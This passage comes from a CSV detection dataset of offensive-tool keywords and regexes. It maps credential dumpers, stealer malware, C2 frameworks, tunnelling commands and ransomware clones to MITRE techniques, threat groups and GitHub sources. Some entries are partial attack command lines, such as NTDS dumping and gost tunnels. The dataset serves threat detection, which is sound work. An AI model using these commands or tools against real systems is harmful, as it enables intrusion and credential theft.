Access","https://github.com/jfjallid/go-secdump","1","0","N/A","N/A","10","5","457","51","2025-02-21T19:16:11Z","2023-02-23T17:02:50Z","46611" "*go-secdump.exe*",".{0,1000}go\-secdump\.exe.{0,1000}","offensive_tool_keyword","go-secdump","Tool to 
remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","N/A","10","5","457","51","2025-02-21T19:16:11Z","2023-02-23T17:02:50Z","46612" "*go-secdump-main*",".{0,1000}go\-secdump\-main.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","N/A","10","5","457","51","2025-02-21T19:16:11Z","2023-02-23T17:02:50Z","46613" "*gosecretsdump -ntds *-system *",".{0,1000}gosecretsdump\s\-ntds\s.{0,1000}\-system\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46614" "*gosecretsdump v* (@C__Sto*",".{0,1000}gosecretsdump\sv.{0,1000}\s\(\@C__Sto.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","46615" "*gosecretsdump/cmd*",".{0,1000}gosecretsdump\/cmd.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","46616" "*gosecretsdump_win*.exe*",".{0,1000}gosecretsdump_win.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really 
fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","46617" "*gosecure/pyrdp*",".{0,1000}gosecure\/pyrdp.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","46618" "*GoSecure/pyrdp*",".{0,1000}GoSecure\/pyrdp.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","46619" "*go-shellcode.py*",".{0,1000}go\-shellcode\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","N/A","10","10","17","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z","46620" "*goShellCodeByPassVT*",".{0,1000}goShellCodeByPassVT.{0,1000}","offensive_tool_keyword","cobaltstrike","generate shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - 
LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/fcre1938/goShellCodeByPassVT","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46621" "*goshs -b * --ssl --self-signed -p * -d /workspace*",".{0,1000}goshs\s\-b\s.{0,1000}\s\-\-ssl\s\-\-self\-signed\s\-p\s.{0,1000}\s\-d\s\/workspace.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46622" "*gost -L=:* -F=*:*",".{0,1000}gost\s\-L\=\:.{0,1000}\s\-F\=.{0,1000}\:.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","Dispossessor - EMBER BEAR","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","N/A","10","16646","2539","2024-12-31T13:08:51Z","2015-03-20T09:45:08Z","46624" "*gost -L=admin:*@localhost:*",".{0,1000}gost\s\-L\=admin\:.{0,1000}\@localhost\:.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. 
they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","Dispossessor - EMBER BEAR","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","N/A","10","16646","2539","2024-12-31T13:08:51Z","2015-03-20T09:45:08Z","46625" "*gost -L=forward+ssh://:*",".{0,1000}gost\s\-L\=forward\+ssh\:\/\/\:.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","Dispossessor - EMBER BEAR","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","N/A","10","16646","2539","2024-12-31T13:08:51Z","2015-03-20T09:45:08Z","46626" "*gost -L=rtcp://*",".{0,1000}gost\s\-L\=rtcp\:\/\/.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","Dispossessor - EMBER BEAR","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","N/A","10","16646","2539","2024-12-31T13:08:51Z","2015-03-20T09:45:08Z","46627" "*gost -L=rudp://*",".{0,1000}gost\s\-L\=rudp\:\/\/.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. 
they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","Dispossessor - EMBER BEAR","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","N/A","10","16646","2539","2024-12-31T13:08:51Z","2015-03-20T09:45:08Z","46628" "*gost -L=ssh://:",".{0,1000}gost\s\-L\=ssh\:\/\/\:","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","Dispossessor - EMBER BEAR","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","N/A","10","16646","2539","2024-12-31T13:08:51Z","2015-03-20T09:45:08Z","46630" "*gost -L=ssu://*",".{0,1000}gost\s\-L\=ssu\:\/\/.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","Dispossessor - EMBER BEAR","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","N/A","10","16646","2539","2024-12-31T13:08:51Z","2015-03-20T09:45:08Z","46631" "*gost -L=udp://*",".{0,1000}gost\s\-L\=udp\:\/\/.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. 
they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","Dispossessor - EMBER BEAR","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","N/A","10","16646","2539","2024-12-31T13:08:51Z","2015-03-20T09:45:08Z","46632" "*Got encrypted TGT for * but couldn't convert to hash*",".{0,1000}Got\sencrypted\sTGT\sfor\s.{0,1000}\sbut\scouldn\'t\sconvert\sto\shash.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","46633" "*Got expected RPC_S_SERVER_UNAVAILABLE exception. Attack worked*",".{0,1000}Got\sexpected\sRPC_S_SERVER_UNAVAILABLE\sexception\.\sAttack\sworked.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","46634" "*Got lsass.exe PID: *",".{0,1000}Got\slsass\.exe\sPID\:\s.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","46635" "*gotato -m 
http*",".{0,1000}gotato\s\-m\shttp.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","46636" "*gotato -m pipe*",".{0,1000}gotato\s\-m\spipe.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","46637" "*gotato* -n mal*",".{0,1000}gotato.{0,1000}\s\-n\smal.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","46638" "*gotato* -p 4644*",".{0,1000}gotato.{0,1000}\s\-p\s4644.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","46639" "*Gotato-main.*",".{0,1000}Gotato\-main\..{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. 
Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","46640" "*govolution/avet*",".{0,1000}govolution\/avet.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","46651" "*goWMIExec -target ",".{0,1000}goWMIExec\s\-target\s","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","46652" "*goWMIExec/pkg*",".{0,1000}goWMIExec\/pkg.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","1","N/A","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","46653" "*goZulipC2.go*",".{0,1000}goZulipC2\.go.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","N/A","10","","N/A","","","","46654" "*goZulipC2-main*",".{0,1000}goZulipC2\-main.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging 
Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","N/A","10","","N/A","","","","46655" "*gp 'HKCU:\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\').State*",".{0,1000}gp\s\'HKCU\:\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust\sProviders\\\'\)\.State.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#registry","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","46656" "*gpg2john.*",".{0,1000}gpg2john\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","46659" "*gpoddity.py*",".{0,1000}gpoddity\.py.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","46660" "*gpoddity_smbserver.py*",".{0,1000}gpoddity_smbserver\.py.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","46661" "*GPOddity-master*",".{0,1000}GPOddity\-master.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - 
T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","46662" "*GPO-RemoteAccess.txt*",".{0,1000}GPO\-RemoteAccess\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","46663" "*gpp_autologin.py*",".{0,1000}gpp_autologin\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","46664" "*gpp_password.py*",".{0,1000}gpp_password\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","46665" 
"*GPP_Passwords.txt*",".{0,1000}GPP_Passwords\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","46666" "*gppassword.py*",".{0,1000}gppassword\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","46667" "*gpp-decrypt *",".{0,1000}gpp\-decrypt\s.{0,1000}","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A","46668" "*gpp-decrypt.py -f groups.xml*",".{0,1000}gpp\-decrypt\.py\s\-f\sgroups\.xml.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46669" "*gpp-decrypt.rb*",".{0,1000}gpp\-decrypt\.rb.{0,1000}","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A","46670" 
"*GPSCoordinates.exe*",".{0,1000}GPSCoordinates\.exe.{0,1000}","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","46671" "*Gr1mmie/AtlasC2*",".{0,1000}Gr1mmie\/AtlasC2.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","N/A","10","10","211","41","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z","46672" "*Grab Password From IE Window*",".{0,1000}Grab\sPassword\sFrom\sIE\sWindow.{0,1000}","offensive_tool_keyword","RouterPassView","help you to recover your lost password from your router file","T1002 - T1552 - T1027","TA0006 - TA0007","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/router_password_recovery.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46673" "*Grabbed by Blank Grabber | *",".{0,1000}Grabbed\sby\sBlank\sGrabber\s\|\s.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","46674" "*Grabbed the username and password from vcenter_creds.txt*",".{0,1000}Grabbed\sthe\susername\sand\spassword\sfrom\svcenter_creds\.txt.{0,1000}","offensive_tool_keyword","POC","PoC - Authenticated Remote Code Execution in VMware vCenter Server (CVE-2024-22274 Exploit)","T1213 - T1059 - T1056 - 
T1078 - T1578","TA0001 - TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/l0n3m4n/CVE-2024-22274-RCE","1","0","N/A","N/A","10","1","42","8","2024-07-16T23:22:14Z","2024-07-15T07:26:59Z","46675" "*grabMinecraftCache(*",".{0,1000}grabMinecraftCache\(.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","46676" "*grabPasswords(self,mkp,bname,pname,data)*",".{0,1000}grabPasswords\(self,mkp,bname,pname,data\).{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","46677" "*grahamhelton/IMDSpoof*",".{0,1000}grahamhelton\/IMDSpoof.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & 
Spoofing","https://github.com/grahamhelton/IMDSpoof","1","1","N/A","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","46678" "*GRANT ALL PRIVILEGES ON jasmin_db.*",".{0,1000}GRANT\sALL\sPRIVILEGES\sON\sjasmin_db\..{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","46679" "*GrantMailboxAccess.ps1*",".{0,1000}GrantMailboxAccess\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","46681" "*GrantSamAccessPermission.vbs*",".{0,1000}GrantSamAccessPermission\.vbs.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - 